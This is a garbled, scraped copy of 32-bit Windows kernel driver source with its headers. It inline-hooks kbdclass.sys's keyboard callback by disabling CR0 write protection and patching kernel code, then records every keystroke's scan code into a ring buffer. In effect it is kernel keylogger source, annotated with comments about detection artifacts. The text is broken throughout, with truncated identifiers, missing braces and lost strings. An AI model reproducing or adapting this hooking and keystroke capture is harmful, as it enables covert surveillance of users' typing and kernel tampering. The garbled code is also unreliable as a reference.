
#ifndef _DBGHELP_H
#define _DBGHELP_H 1
#include &ntddk.h&
#define dprintf if (DBG) DbgPrint
#define nprintf DbgPrint
#define kmalloc(_s)&ExAllocatePoolWithTag(NonPagedPool, _s, 'SYSQ')
//#define kfree(_p)&ExFreePoolWithTag(_p, 'SYSQ')
#define kfree(_p)&ExFreePool(_p)
#include &ntddk.h&
//#include &ntifs.h&
#include &windef.h&
#include &HookKey.h&
#include &struct.h&
#include &ntddkbd.h&
// Globals for a 5-byte JMP inline hook on a kbdclass.sys routine.
// Several identifiers on this page are cut off by the scrape (g_OldF, pDevO,
// KeyB, g_kbdclass_, g_lpKbdServiceC, ...); they are kept as-is here.
// Defender note: g_HookCode / jmp_orig_code are raw x86 opcodes (E9 = near
// jmp rel32, EA = far jmp) that HookOldFunction writes over another driver's
// code; comparing the in-memory text of kbdclass.sys with its on-disk image
// is the standard way to surface that kind of patch.
#define MAXBUF 0x15// ring buffer of keyboard scan codes; its first byte is the current store position
ULONG g_OldF
ULONG g_uCr0;  // CR0 value saved by WPOFF() and restored by WPON()
BYTE g_HookCode[5] = { 0xe9, 0, 0, 0, 0 };  // near jmp; the rel32 displacement is filled in by HookOldFunction
BYTE g_OrigCode[5] = { 0 }; // the original first bytes of the hooked function
BYTE jmp_orig_code[7] = { 0xEA, 0, 0, 0, 0, 0x08, 0x00 }; // far jump, hence the 0x08 (segment selector word)
PDEVICE_OBJECT pDevO
BOOL g_bHooked = FALSE;  // TRUE after HookOldFunction, FALSE after UnHookOldFunction
int KeyCode=0;  // only printed in OnUnload in the visible code
PVOID hPageDataS
PVOID KeyB
PDEVICE_OBJECT g_kbDeviceObject = NULL;
ULONG g_kbdclass_
ULONG g_lpKbdServiceC
VOID& ReadKeyBuf();
VOID& ChangeFake_Function();
// Prototype of the hook body; its return type and closing ')' are lost in this copy.
fake_OldFunction (
&&&&& PDEVICE_OBJECT& DeviceObject,
&&&&& PKEYBOARD_INPUT_DATA& InputDataStart,
&&&&& PKEYBOARD_INPUT_DATA& InputDataEnd,
&&&&& PULONG& InputDataConsumed
#ifdef ALLOC_PRAGMA
#pragma alloc_text(NONPAGED, fake_OldFunction)
& HookKey.H
& Author: &your name&
& Last Updated:
& This framework is generated by EasySYS 0.3.0
& This template file is copying from QuickSYS 0.3.0 written by Chunhua Liu
// HookKey.h: IOCTL codes and device names for the user-mode front end.
// The string values of the *_NAME_* macros were lost in this copy (quotes and
// backslashes rendered as '&' and '//'), and the _UNICODE conditional has no
// #else / #endif in the visible lines, so both sets of defines appear in a row.
#ifndef _HOOKKEY_H
#define _HOOKKEY_H 1
// Define the various device type values.& Note that values used by Microsoft
// Corporation are in the range 0-0x7FFF(32767), and 0x)-0xFFFF(65535)
// are reserved for use by customers.
#define FILE_DEVICE_HOOKKEY&0x8000
// Macro definition for defining IOCTL and FSCTL function control codes. Note
// that function codes 0-0x7FF(2047) are reserved for Microsoft Corporation,
// and 0x800(2048)-0xFFF(4095) are reserved for customers.
#define HOOKKEY_IOCTL_BASE&0x800
// The device driver IOCTLs
#define CTL_CODE_HOOKKEY(i) CTL_CODE(FILE_DEVICE_HOOKKEY, HOOKKEY_IOCTL_BASE+i, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_HOOKKEY_HELLO&CTL_CODE_HOOKKEY(0)
#define IOCTL_HOOKKEY_TEST&CTL_CODE_HOOKKEY(1)
// Name that Win32 front end will use to open the HookKey device
#define HOOKKEY_WIN32_DEVICE_NAME_A&&////.//HookKey
#define HOOKKEY_WIN32_DEVICE_NAME_W&L&////.//HookKey
#define HOOKKEY_DEVICE_NAME_A&&&&
#define HOOKKEY_DEVICE_NAME_W&&&L&
#define HOOKKEY_DOS_DEVICE_NAME_A&&&
#define HOOKKEY_DOS_DEVICE_NAME_W&&L&
#ifdef _UNICODE
#define HOOKKEY_WIN32_DEVICE_NAME HOOKKEY_WIN32_DEVICE_NAME_W
#define HOOKKEY_DEVICE_NAME&&HOOKKEY_DEVICE_NAME_W
#define HOOKKEY_DOS_DEVICE_NAME&HOOKKEY_DOS_DEVICE_NAME_W
#define HOOKKEY_WIN32_DEVICE_NAME HOOKKEY_WIN32_DEVICE_NAME_A
#define HOOKKEY_DEVICE_NAME&&HOOKKEY_DEVICE_NAME_A
#define HOOKKEY_DOS_DEVICE_NAME&HOOKKEY_DOS_DEVICE_NAME_A
// Forward declaration of the trampoline (return type and closing ')' lost in
// this copy), followed by the function-pointer type this driver uses for the
// KeyboardClassServiceCallback signature. orig_KeyboardClassServiceCallback is
// declared here but is not assigned anywhere in the visible code; the hook
// uses g_OldFunction instead.
Proxy_OldFunction (
PDEVICE_OBJECT& DeviceObject,
PKEYBOARD_INPUT_DATA& InputDataStart,
PKEYBOARD_INPUT_DATA& InputDataEnd,
PULONG& InputDataConsumed
typedef VOID
(*My_KeyboardClassServiceCallback) (
&&&&&&&&&PDEVICE_OBJECT& DeviceObject,
&&&&&&&&&PKEYBOARD_INPUT_DATA& InputDataStart,
&&&&&&&&&PKEYBOARD_INPUT_DATA& InputDataEnd,
&&&&&&&&&PULONG& InputDataConsumed
&&&&&&&&&);
My_KeyboardClassServiceCallback orig_KeyboardClassServiceCallback = NULL;
// Clears CR0.WP (bit 16) so that read-only kernel code pages can be written,
// and masks interrupts (cli); the pre-modification CR0 value is kept in
// g_uCr0 for WPON(). Braces and the __asm block opener are missing in this copy.
// Defender note: a driver clearing CR0.WP is a strong indicator of kernel
// code patching; CR0 is per-processor, so this affects only the current CPU.
void WPOFF()
&&& ULONG uA
&&&&&&& mov eax, cr0;
&&&&&&& mov uAttr,
&&&&&&& and eax, 0FFFEFFFFh; // CR0 16 BIT = 0
&&&&&&& mov cr0,
&&&&&&& cli
&&& g_uCr0 = uA // save the original CR0 value
// Re-enables interrupts (sti) and writes the CR0 value saved by WPOFF() back,
// restoring write protection. Braces and the __asm opener are missing here.
VOID WPON()
&&&&&&& sti
&&&&&&& mov eax, g_uCr0; // restore the original CR0 attributes
&&&&&&& mov cr0,
// Remove the inline hook.
// Copies the 5 saved bytes (g_OrigCode) back over the start of the target
// with write protection cleared and IRQL at DPC level. Braces are missing in
// this copy. Nothing here consults g_bHooked first, so if HookOldFunction
// never ran, g_OrigCode's zeros would be copied over the target.
VOID UnHookOldFunction ()
&&& KIRQL& oldI
&&& WPOFF();
&&& oldIrql = KeRaiseIrqlToDpcLevel();
&&& RtlCopyMemory ( (BYTE*)g_OldFunction, g_OrigCode, 5 );
&&& KeLowerIrql(oldIrql);
&&& WPON();
&&& g_bHooked = FALSE;
// Install the inline hook on OldFunction.
// Saves the first 5 bytes of the target, overwrites them with a JMP to
// fake_OldFunction, and builds the trampoline in Proxy_OldFunction: the saved
// 5 bytes followed by the 7-byte far jump to target+5. Write protection is
// cleared and IRQL raised to DPC level around the writes.
// In this copy no return is visible after the "OldFunction == NULL" message,
// so a zero target would be dereferenced by the copies below.
// Defender note: both the overwritten prologue of kbdclass.sys and the far
// jump written into this driver's own Proxy_OldFunction body are visible to a
// text-section integrity check; on x64 Windows, driver signature enforcement
// and Kernel Patch Protection are designed to block this class of patching.
VOID HookOldFunction ()
&&& KIRQL& oldI
&&& if (g_OldFunction == 0) {
&&&&&&& DbgPrint(&OldFunction == NULL/n&);
&&& //DbgPrint(&开始inline hook --& OldFunction/n&);
&&& DbgPrint( &OldFunction的地址t0x%08x/n&, (ULONG)g_OldFunction );
&&& // save the original first bytes of the target
&&& RtlCopyMemory (g_OrigCode, (BYTE*)g_OldFunction, 5);//★
&&& *( (ULONG*)(g_HookCode + 1) ) = (ULONG)fake_OldFunction - (ULONG)g_OldFunction - 5;//★ rel32 = dest - (src + 5)
&&& // disable write protection, raise IRQL to DPC level
&&& WPOFF();
&&& oldIrql = KeRaiseIrqlToDpcLevel();
&&& RtlCopyMemory ( (BYTE*)g_OldFunction, g_HookCode, 5 );
&&& *( (ULONG*)(jmp_orig_code + 1) ) = (ULONG) ( (BYTE*)g_OldFunction + 5 );//★ far jump target: original function + 5
&&& RtlCopyMemory ( (BYTE*)Proxy_OldFunction, g_OrigCode, 5);// patch the head of Proxy_OldFunction
&&& RtlCopyMemory ( (BYTE*)Proxy_OldFunction + 5, jmp_orig_code, 7);
&&& // restore write protection, lower IRQL
&&& KeLowerIrql(oldIrql);
&&& WPON();
&&& g_bHooked = TRUE;
// Patches the KeyBuf pointer into fake_OldFunction's code: scans 0x200 bytes
// from the start of fake_OldFunction for the 0xAAAAAAAA placeholder and
// replaces each match with the KeyBuf address. The loop index `i` has no
// visible declaration and the braces are missing in this copy. WPON() is
// called at the end, but no WPOFF() appears in the visible lines.
VOID& ChangeFake_Function()
&KIRQL& oldI
&ULONG addr=(ULONG)fake_OldF
&ULONG code_fill=0xAAAAAAAA;  // placeholder operand in fake_OldFunction's `mov eax, [0xAAAAAAAA]`
&DbgPrint(&fake_OldFunction:%x&,addr);
&&& oldIrql = KeRaiseIrqlToDpcLevel();
&&& for (i=0;i&0x200;i++)
&&if (*((ULONG*)(addr+i))==code_fill)
&&&DbgPrint(&AAAAAAAA Finded:%x&,KeyBuf);
&&&*((ULONG*)(addr+i))=(ULONG)KeyB
&DbgPrint(&AAAAAAAA:%x&,*((ULONG*)(addr+i))& );
&&& KeLowerIrql(oldIrql);
&&& WPON();
// Dumps the capture buffer to the debugger. Byte 0 of KeyBuf is the current
// store position and bytes 1..MAXBUF hold scan codes (see fake_OldFunction);
// the loop prints bytes 0..MAXBUF-1 via DbgPrint. `Index` is read but not
// used in the visible lines; braces are missing in this copy.
VOID& ReadKeyBuf()
&BYTE Index=*(BYTE*)KeyB
&BYTE i,j;
//&BYTE _Buf[MAXBUF];
&for (i=0;i&MAXBUF;i++)
&&DbgPrint(&Key Code:%x&,*(BYTE*)((BYTE*)KeyBuf+i));
// Jump into our function for pre-processing.
// Naked hook body: runs in place of the first 5 bytes of the hooked kbdclass
// routine with that routine's arguments still on the stack. It records the
// low byte of the MakeCode field (offset 2 of KEYBOARD_INPUT_DATA) of the
// first input packet into a ring buffer at KeyBuf, then jumps to the
// trampoline so the original routine still runs. Braces and the __asm opener
// are missing in this copy.
// Risk note: every keystroke passing through kbdclass is captured before the
// class driver processes it.
__declspec (naked)
fake_OldFunction (
PDEVICE_OBJECT& DeviceObject,
PKEYBOARD_INPUT_DATA& InputDataStart,
PKEYBOARD_INPUT_DATA& InputDataEnd,
PULONG& InputDataConsumed
&&&push&&& eax
&&&&&&& push&&& ebx
&&&&&&& push&&& ecx
&&push&&& esi
&&xor&&&& esi,esi
&&mov&&&& eax, [0xAAAAAAAA]; // placeholder, rewritten to the KeyBuf address by ChangeFake_Function
&&mov&&&& ebx, [esp+0x18] // InputDataStart: 4 pushes + return address sit above the arguments
&& //movzx&& ecx, word ptr [ebx-20]//+2
&&mov&&&& cl , byte ptr [ebx+2];// key (make) code
&&&&&&& mov&&&& ch , byte ptr [eax];// current store position -> ch
&&&&&&& cmp&&&& ch , MAXBUF
&&jnz&&&& NotLastPlace
&&mov&&&& ch,& 0x0; // wrap around when the last slot was used
NotLastPlace:
&&inc&&&& ch
&&movzx&& si,ch
&&mov&&&& byte ptr [eax],&&& ch // new position stored in byte 0
&&&&&&& mov&&&& byte ptr [eax+esi],cl // scan code stored in slot 1..MAXBUF
&&&&&&& pop esi
&&&pop ecx
&&&pop ebx
&&&pop eax
&&jmp Proxy_OldFunction&& ;//★ none of these transfers uses CALL; this keeps the code simple and more stable
// Proxy function: jumps back into the original function to continue execution.
// Trampoline body: 12 NOPs that HookOldFunction overwrites at run time with
// the 5 saved prologue bytes followed by the 7-byte far jump (jmp_orig_code).
// The NOPs only become meaningful code after that patch, i.e. this driver
// modifies its own text section — a self-modifying-code indicator for
// integrity tooling. Braces are missing in this copy.
__declspec (naked)
Proxy_OldFunction (
&&& PDEVICE_OBJECT& DeviceObject,
&&& PKEYBOARD_INPUT_DATA& InputDataStart,
&&& PKEYBOARD_INPUT_DATA& InputDataEnd,
&&& PULONG& InputDataConsumed
&&& __asm {& // bytes in total (count lost in this copy)
&&&&&&&&&&& _emit 0x90
&&&&&&&&&&& _emit 0x90
&&&&&&&&&&& _emit 0x90
&&&&&&&&&&& _emit 0x90
&&&&&&&&&&& _emit 0x90& // the first bytes replay the original function's prologue
&&&&&&&&&&& _emit 0x90& // this is where the jmp is filled in
&&&&&&&&&&& _emit 0x90
&&&&&&&&&&& _emit 0x90
&&&&&&&&&&& _emit 0x90
&&&&&&&&&&& _emit 0x90& // these bytes hold the address of the original function + 5
&&&&&&&&&&& _emit 0x90&
&&&&&&&&&&& _emit 0x90& // far jump, so this must be 0x0080
//////////////////////////////////////////////////////////////////////////
// Returns the load address of the named kernel module, or of the first list
// entry (the kernel) when bKernelBase is TRUE, by walking the
// SystemModuleInformation list; returns 0 on failure. The return type, the
// `_x_:` label, several declarations (buf, status, module, index) and the
// braces are lost in this copy. The early `return 0` after the failed second
// query leaves `buf` allocated. The PagedPool allocation carries no tag.
GetModlueBaseAdress(
&&&&&char* ModlueName,
&&&&&BOOL bKernelBase
&ULONG size,
&PSYSTEM_MODULE_INFORMATION
&PVOID driverAddress=0;
&ZwQuerySystemInformation(SystemModuleInformation,&size, 0, &size); // first call only obtains the required size
&if(NULL==(buf = (PULONG)ExAllocatePool(PagedPool, size))){
&&DbgPrint(&failed alloc memory failed /n&);
&&return 0;
&status=ZwQuerySystemInformation(SystemModuleInformation,buf, size , 0);
&if(!NT_SUCCESS( status )) {
&&DbgPrint(&failed query/n&);
&&return 0;
&module = (PSYSTEM_MODULE_INFORMATION)(( PULONG )buf + 1); // skip the leading module count
&// base of the kernel (first module)
&if ( TRUE == bKernelBase )
&&driverAddress = module[0].B
&&DbgPrint(&KernelBase:%x/n&,driverAddress);
&&goto _x_;
&// base of any other module, matched case-insensitively by file name
&for (index = 0; index & * index++) {
&&if (_stricmp(module[index].ImageName + module[index].ModuleNameOffset, ModlueName) == 0)
&&&driverAddress = module[index].B
&&&DbgPrint(&Module found at:%x/n&,driverAddress);
&&&goto _x_;
&ExFreePool(buf);
&return driverA
// Resolves an exported kernel routine by name via MmGetSystemRoutineAddress
// and returns it as a ULONG (0 when not found). Braces are missing in this
// copy; the function is not called from the visible code.
ULONG GetFunctionAddr( IN PCWSTR FunctionName)
&&& UNICODE_STRING UniCodeFunctionN
&&& RtlInitUnicodeString( &UniCodeFunctionName, FunctionName );
&&& return (ULONG)MmGetSystemRoutineAddress( &UniCodeFunctionName );&&
// Locate OldFunction by byte signature.
// Scans the first 0x2000 bytes of kbdclass.sys for a 4-dword signature of
// KeyboardClassServiceCallback (the `_sp2` suffix suggests it matches one
// service-pack build only; the third dword's value is lost in this copy).
// Returns the matching address, or 0 when kbdclass.sys is not found (the
// STATUS_SUCCESS returned there happens to be 0). The scan assumes the whole
// range is mapped and resident. Several locals (g_kbdclass_, g_lpKbdServiceC,
// g_kbDeviceObject) carry the same truncated names as the file-scope globals;
// if they shadow them, the global never receives the address and, when the
// signature does not match, the returned value comes from an uninitialised
// local. Braces are missing in this copy.
// Defender note: signature-bound hooks like this only engage on the exact
// build they were written for; elsewhere g_OldFunction stays 0.
ULONG FindOldFunctionAddress()
&NTSTATUS status = STATUS_SUCCESS;
&UNICODE_STRING ustrLinkN
&UNICODE_STRING ustrDevN&&&
&PDEVICE_OBJECT pDevO
&ULONG i, curA
&PUCHAR FileC
&DWORD dwRet,dwS
&&& LARGE_INTEGER
&ULONG g_kbdclass_
&ULONG g_lpKbdServiceC
&PDEVICE_OBJECT g_kbDeviceObject = NULL;
&&& KEYBOARD_INPUT_DATA
&ULONG Addr_OldFunction = 0;
&ULONG code1_sp2=0x8b55ff8b, code2_sp2=0x8b5151ec, code3_sp2=0x,code4_sp2=0x8b530008; // 16-byte prologue signature
&&& //KbdInit();
&g_kbdclass_base = (ULONG)GetModlueBaseAdress( &kbdclass.sys&,0 );
&DbgPrint(&kbdclass.sys: 0x%08lx/n&, (PVOID)g_kbdclass_base);
&if ( 0 == g_kbdclass_base ) {
&&DbgPrint(&ERROR: g_kbdclass_base == 0/n&);
&&return STATUS_SUCCESS;
&curAddr = g_kbdclass_
&//&DbgPrint(&curAddr: 0x%08lx/n&, curAddr);
&for (i=curAi&=curAddr+0x2000;i++)
&&//&DbgPrint(&i: 0x%08lx/n&, i);
&&if (*((ULONG *)i)==code1_sp2) {
&&&if (*((ULONG *)(i+4))==code2_sp2) {
&&&&if (*((ULONG *)(i+8))==code3_sp2) {
&&&&&if (*((ULONG *)(i+12))==code4_sp2) {
&&&&&&g_lpKbdServiceCallback=i;
&Addr_OldFunction = (ULONG)g_lpKbdServiceC
&DbgPrint(&KeyboardClassServiceCallback: 0x%08lx/n&, (PVOID)g_lpKbdServiceCallback);
&//DbgPrint(&g_kbDeviceObject: 0x%08lx/n&, (PVOID)g_kbDeviceObject);
&return Addr_OldF
// Unload routine: dumps the capture buffer to the debugger, frees it, removes
// the symbolic link and device, and restores the patched bytes. The link name
// (after L&) and the braces are lost in this copy.
// KeyBuf is freed before UnHookOldFunction() runs, so the still-installed hook
// can write into freed pool during that window.
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
& UNICODE_STRING strL
& RtlInitUnicodeString(&strLink, L&
& DbgPrint(&My Driver Unloaded!&);
& DbgPrint(&MyKeyboardClassServiceCallback invoked: %x&,KeyCode);
& ReadKeyBuf(); // print every captured scan code
& ExFreePool(KeyBuf);
& IoDeleteSymbolicLink(&strLink);
& IoDeleteDevice(DriverObject-&DeviceObject);
& UnHookOldFunction();
// Driver entry: creates the control device and its symbolic link (names lost
// in this copy), allocates the NonPagedPool capture buffer, patches the KeyBuf
// pointer into fake_OldFunction, locates the kbdclass target and installs the
// hook. On the visible lines no return follows the IoCreateDevice /
// IoCreateSymbolicLink failure branches, the ExAllocatePool result is written
// through without a NULL check, and STATUS_SUCCESS is returned whether or not
// the hook was installed. Braces are missing in this copy.
// Defender note: observable artifacts are the new device object and symbolic
// link, an untagged NonPagedPool allocation of MAXBUF+2 bytes, and modified
// code bytes in kbdclass.sys and in this driver's own image.
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
& NTSTATUS status = STATUS_SUCCESS;
& UNICODE_STRING ustrLinkN
& UNICODE_STRING ustrDevN&&&
& DWORD dwSize,dwR
& PVOID pT
& KEYBOARD_INPUT_DATA
& DbgPrint(&My Driver Loaded!&);
& theDriverObject-&DriverUnload = OnU
& RtlInitUnicodeString(&ustrDevName, L&
& status = IoCreateDevice(theDriverObject,
&& &ustrDevName,
&& FILE_DEVICE_UNKNOWN,
&& &pDevObj);
& if(!NT_SUCCESS(status))&{
&& DbgPrint(&IoCreateDevice = 0x%x/n&, status);
& RtlInitUnicodeString(&ustrLinkName, L&
& status = IoCreateSymbolicLink(&ustrLinkName, &ustrDevName);&
& if(!NT_SUCCESS(status)) {
&& DbgPrint(&IoCreateSymbolicLink = 0x%x/n&, status);
&& IoDeleteDevice(pDevObj);&
& KeyBuf=(PVOID)ExAllocatePool( NonPagedPool,MAXBUF+2); // byte 0 = position, slots 1..MAXBUF = scan codes
& *((BYTE*)KeyBuf)=0x0; // start position; dereferenced even if the allocation failed
& ChangeFake_Function();
& g_OldFunction = FindOldFunctionAddress();
& HookOldFunction();
& return STATUS_SUCCESS;
/***************************************************************************************
* AUTHOR : sudami []
* TIME&& :
[13:8:2008 - 13:07]
* MODULE : struct.h
* Command:
*&& Header file for the driver
* Description:
*&& Defines some common constants to avoid repeated work; add the functions/structures you need here
* Copyright (c) 2008 - 2010 sudami.
* Freely distributable in source or binary for noncommercial purposes.
* TAKE IT EASY,JUST FOR FUN.
****************************************************************************************/
#pragma once
#include &ntddk.h&
// Win32-style scalar typedefs layered over ntddk.h. DWORD, PDWORD, WORD and
// BYTE are each typedef'd twice in this run (C11 and MSVC accept identical
// redefinitions). The SEC_IMAGE value is lost in this copy.
typedef long LONG;
//typedef unsigned char& BOOL, *PBOOL;
typedef unsigned char& BYTE, *PBYTE;
typedef unsigned long& DWORD, *PDWORD;
typedef unsigned short WORD, *PWORD;
//typedef void& *HMODULE;
typedef long NTSTATUS, *PNTSTATUS;
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
typedef unsigned long ULONG;
typedef unsigned long ULONG_PTR;
typedef ULONG *PULONG;
typedef unsigned short WORD;
typedef unsigned char BYTE;
typedef unsigned char UCHAR;
typedef unsigned short USHORT;
typedef void *PVOID;
typedef BYTE BOOLEAN;
#define SEC_IMAGE&&& 0x
//----------------------------------------------------
// SYSTEM_INFORMATION_CLASS as reproduced on this page. The only value the
// visible driver code uses is SystemModuleInformation (11), in
// GetModlueBaseAdress. Several enumerators deliberately share a value
// (25, 28, 29, 30, 44), which C permits.
typedef enum _SYSTEM_INFORMATION_CLASS {
&SystemBasicInformation = 0,
&SystemCpuInformation = 1,
&SystemPerformanceInformation = 2,
&SystemTimeOfDayInformation = 3, /* was SystemTimeInformation */
&Unknown4,
&SystemProcessInformation = 5,
&Unknown6,
&Unknown7,
&SystemProcessorPerformanceInformation = 8,
&Unknown9,
&Unknown10,
&SystemModuleInformation = 11,
&Unknown12,
&Unknown13,
&Unknown14,
&Unknown15,
&SystemHandleInformation = 16,
&Unknown17,
&SystemPageFileInformation = 18,
&Unknown19,
&Unknown20,
&SystemCacheInformation = 21,
&Unknown22,
&SystemInterruptInformation = 23,
&SystemDpcBehaviourInformation = 24,
&SystemFullMemoryInformation = 25,
&SystemNotImplemented6 = 25,
&SystemLoadImage = 26,
&SystemUnloadImage = 27,
&SystemTimeAdjustmentInformation = 28,
&SystemTimeAdjustment = 28,
&SystemSummaryMemoryInformation = 29,
&SystemNotImplemented7 = 29,
&SystemNextEventIdInformation = 30,
&SystemNotImplemented8 = 30,
&SystemEventIdsInformation = 31,
&SystemCrashDumpInformation = 32,
&SystemExceptionInformation = 33,
&SystemCrashDumpStateInformation = 34,
&SystemKernelDebuggerInformation = 35,
&SystemContextSwitchInformation = 36,
&SystemRegistryQuotaInformation = 37,
&SystemCurrentTimeZoneInformation = 44,
&SystemTimeZoneInformation = 44,
&SystemLookasideInformation = 45,
&SystemSetTimeSlipEvent = 46,
&SystemCreateSession = 47,
&SystemDeleteSession = 48,
&SystemInvalidInfoClass4 = 49,
&SystemRangeStartInformation = 50,
&SystemVerifierInformation = 51,
&SystemAddVerifier = 52,
&SystemSessionProcessesInformation&= 53,
&SystemInformationClassMax
} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
// Per-module record returned for SystemModuleInformation, followed by the
// count-prefixed array wrapper. Most member names are truncated in this copy;
// GetModlueBaseAdress reads the base field (`.B`), ImageName and
// ModuleNameOffset.
typedef struct _SYSTEM_MODULE_INFORMATION {//Information Class 11
&ULONG&&& Reserved[2];
&PVOID&&& B
&ULONG&&& S
&ULONG&&& F
&USHORT&&& I
&USHORT&&& U
&USHORT&&& LoadC
&USHORT&&& ModuleNameO
&CHAR&&& ImageName[256];
}SYSTEM_MODULE_INFORMATION,*PSYSTEM_MODULE_INFORMATION;
typedef struct {
&DWORD&&& dwNumberOfM
&SYSTEM_MODULE_INFORMATION&&&
} MODULES, *PMODULES;
// Undocumented user-mode process structures (PEB loader data, a partial PEB
// layout, the PEB free-block list and drive-letter current directories).
// None of these are referenced by the visible driver code. Member names are
// truncated and _PEB_FREE_BLOCK has no closing brace in this copy.
#pragma pack(4)
typedef struct _PEB_LDR_DATA
&BOOLEAN I
&PVOID SsH
&LIST_ENTRY InLoadOrderModuleL
&LIST_ENTRY InMemoryOrderModuleL
&LIST_ENTRY InInitializationOrderModuleL
} PEB_LDR_DATA, *PPEB_LDR_DATA;
#pragma pack()
typedef struct _PEB_ORIG {
&&& BYTE Reserved1[2];
&&& BYTE BeingD
&&& BYTE Reserved2[229];
&&& PVOID Reserved3[59];
&&& ULONG SessionId;
} PEB_ORIG, *PPEB_ORIG;
typedef void (*PPEBLOCKROUTINE)(PVOID PebLock);
struct _PEB_FREE_BLOCK {
&struct _PEB_FREE_BLOCK *N
typedef struct _PEB_FREE_BLOCK PEB_FREE_BLOCK;
typedef struct _PEB_FREE_BLOCK *PPEB_FREE_BLOCK;
typedef struct _RTL_DRIVE_LETTER_CURDIR {
&ULONG TimeS
&UNICODE_STRING DosP
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
// RTL_USER_PROCESS_PARAMETERS layout as copied on this page (member names
// truncated). Not referenced by the visible driver code.
typedef struct _RTL_USER_PROCESS_PARAMETERS {
&ULONG MaximumL
&ULONG DebugF
&PVOID ConsoleH
&ULONG ConsoleF
&HANDLE StdInputH
&HANDLE StdOutputH
&HANDLE StdErrorH
&UNICODE_STRING CurrentDirectoryP
&HANDLE CurrentDirectoryH
&UNICODE_STRING DllP
&UNICODE_STRING ImagePathN
&UNICODE_STRING CommandL
&ULONG StartingPositionL
&ULONG StartingPositionT
&ULONG CharW
&ULONG CharH
&ULONG ConsoleTextA
&ULONG WindowF
&ULONG ShowWindowF
&UNICODE_STRING WindowT
&UNICODE_STRING DesktopN
&UNICODE_STRING ShellI
&UNICODE_STRING RuntimeD
&RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20];
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
// PEB layout as copied on this page (member names truncated). Not referenced
// by the visible driver code; the offsets are version-specific and should be
// treated as a snapshot, not a contract.
typedef struct _PEB {
&BOOLEAN InheritedAddressS
&BOOLEAN ReadImageFileExecO
&BOOLEAN BeingD
&BOOLEAN S
&PVOID ImageBaseA
&PPEB_LDR_DATA LoaderD
&PRTL_USER_PROCESS_PARAMETERS ProcessP
&PVOID SubSystemD
&PVOID ProcessH
&PVOID FastPebL
&PPEBLOCKROUTINE FastPebLockR
&PPEBLOCKROUTINE FastPebUnlockR
&ULONG EnvironmentUpdateC
&PVOID *KernelCallbackT
&PVOID EventLogS
&PVOID EventL
&PPEB_FREE_BLOCK FreeL
&ULONG TlsExpansionC
&PVOID TlsB
&ULONG TlsBitmapBits[0x2];
&PVOID ReadOnlySharedMemoryB
&PVOID ReadOnlySharedMemoryH
&PVOID *ReadOnlyStaticServerD
&PVOID AnsiCodePageD
&PVOID OemCodePageD
&PVOID UnicodeCaseTableD
&ULONG NumberOfP
&ULONG NtGlobalF
&BYTE Spare2[0x4];
&LARGE_INTEGER CriticalSectionT
&ULONG HeapSegmentR
&ULONG HeapSegmentC
&ULONG HeapDeCommitTotalFreeT
&ULONG HeapDeCommitFreeBlockT
&ULONG NumberOfH
&ULONG MaximumNumberOfH
&PVOID **ProcessH
&PVOID GdiSharedHandleT
&PVOID ProcessStarterH
&PVOID GdiDCAttributeL
&PVOID LoaderL
&ULONG OSMajorV
&ULONG OSMinorV
&ULONG OSBuildN
&ULONG OSPlatformId;
&ULONG ImageSubS
&ULONG ImageSubSystemMajorV
&ULONG ImageSubSystemMinorV
&ULONG GdiHandleBuffer[0x22];
&ULONG PostProcessInitR
&ULONG TlsExpansionB
&BYTE TlsExpansionBitmapBits[0x80];
&ULONG SessionId;
} PEB, *PPEB;
// SystemProcessInformation record and its per-thread entry, as copied on this
// page (member names truncated). Not referenced by the visible driver code.
typedef struct _SYSTEM_PROCESS_INFORMATION {
&&& ULONG NextEntryO
&&& ULONG NumberOfT
&&& LARGE_INTEGER SpareLi1;
&&& LARGE_INTEGER SpareLi2;
&&& LARGE_INTEGER SpareLi3;
&&& LARGE_INTEGER CreateT
&&& LARGE_INTEGER UserT
&&& LARGE_INTEGER KernelT
&&& UNICODE_STRING ImageN
&&& KPRIORITY BaseP
&&& HANDLE UniqueProcessId;
&&& HANDLE InheritedFromUniqueProcessId;
&&& ULONG HandleC
&&& ULONG SpareUl2;
&&& ULONG SpareUl3;
&&& ULONG PeakVirtualS
&&& ULONG VirtualS
&&& ULONG PageFaultC
&&& ULONG PeakWorkingSetS
&&& ULONG WorkingSetS
&&& ULONG QuotaPeakPagedPoolU
&&& ULONG QuotaPagedPoolU
&&& ULONG QuotaPeakNonPagedPoolU
&&& ULONG QuotaNonPagedPoolU
&&& ULONG PagefileU
&&& ULONG PeakPagefileU
&&& ULONG PrivatePageC
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
typedef struct _SYSTEM_THREAD_INFORMATION {
&&& LARGE_INTEGER KernelT
&&& LARGE_INTEGER UserT
&&& LARGE_INTEGER CreateT
&&& ULONG WaitT
&&& PVOID StartA
&&& CLIENT_ID ClientId;
&&& KPRIORITY P
&&& LONG BaseP
&&& ULONG ContextS
&&& ULONG ThreadS
&&& ULONG WaitR
} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;
// Older-style process/thread enumeration structs and the executive handle
// table layout, as copied on this page. _SYSTEM_THREADS and _SYSTEM_PROCESSES
// have no closing brace and _HANDLE_TABLE_ENTRY_INFO no opening brace in this
// copy; member names are truncated. Not referenced by the visible driver code.
struct _SYSTEM_THREADS
&LARGE_INTEGER&&KernelT
&LARGE_INTEGER&&UserT
&LARGE_INTEGER&&CreateT
&ULONG&&&&WaitT
&PVOID&&&&StartA
&CLIENT_ID&&&ClientIs;
&KPRIORITY&&&P
&KPRIORITY&&&BaseP
&ULONG&&&&ContextSwitchC
&ULONG&&&&ThreadS
&KWAIT_REASON&&WaitR
struct _SYSTEM_PROCESSES
&ULONG&&&&NextEntryD
&ULONG&&&&ThreadC
&ULONG&&&&Reserved[6];
&LARGE_INTEGER&&CreateT
&LARGE_INTEGER&&UserT
&LARGE_INTEGER&&KernelT
&UNICODE_STRING&&ProcessN
&KPRIORITY&&&BaseP
&ULONG&&&&ProcessId;
